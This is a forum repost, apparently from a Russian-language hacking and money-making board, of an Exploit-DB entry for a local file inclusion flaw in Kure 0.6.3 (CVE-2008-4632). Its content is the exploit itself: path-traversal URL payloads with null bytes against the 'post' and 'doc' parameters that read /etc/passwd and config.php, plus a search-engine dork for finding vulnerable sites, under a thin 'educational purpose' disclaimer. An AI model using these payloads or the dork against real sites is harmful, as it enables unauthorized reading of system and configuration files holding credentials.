Kure 0.6.3 - 'index.php' Local File Inclusion | Gerki | Теневой Форум про Заработок и ИБ

Exploiter

Хакер

21 Дек 2022

EDB-ID: 6767

Проверка EDB

Пройдено

Автор: JOSS

Тип уязвимости: WEBAPPS

Платформа: PHP

CVE: cve-2008-4632

Дата публикации: 2008-10-16

Код:

# Kure 0.6.3 (index.php post,doc) Local File Inclusion Vulnerability
# url: http://code.google.com/p/kure/downloads/list
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# *Requirements: magic_quotes_gpc = Off

LFI /etc/passwd:
/?post=../../../../../../../../../../../../../etc/passwd%00
/?doc=../../../../../../../../../../../../../etc/passwd%00

LFI /config.php:
/?post=../config.php%00
/?doc=../config.php%00

dork: "powered by kure"

have fun :D

# milw0rm.com [2008-10-16]

Источник: www.exploit-db.com

Поиск

Exploit Kure 0.6.3 - 'index.php' Local File Inclusion

Exploiter

Похожие темы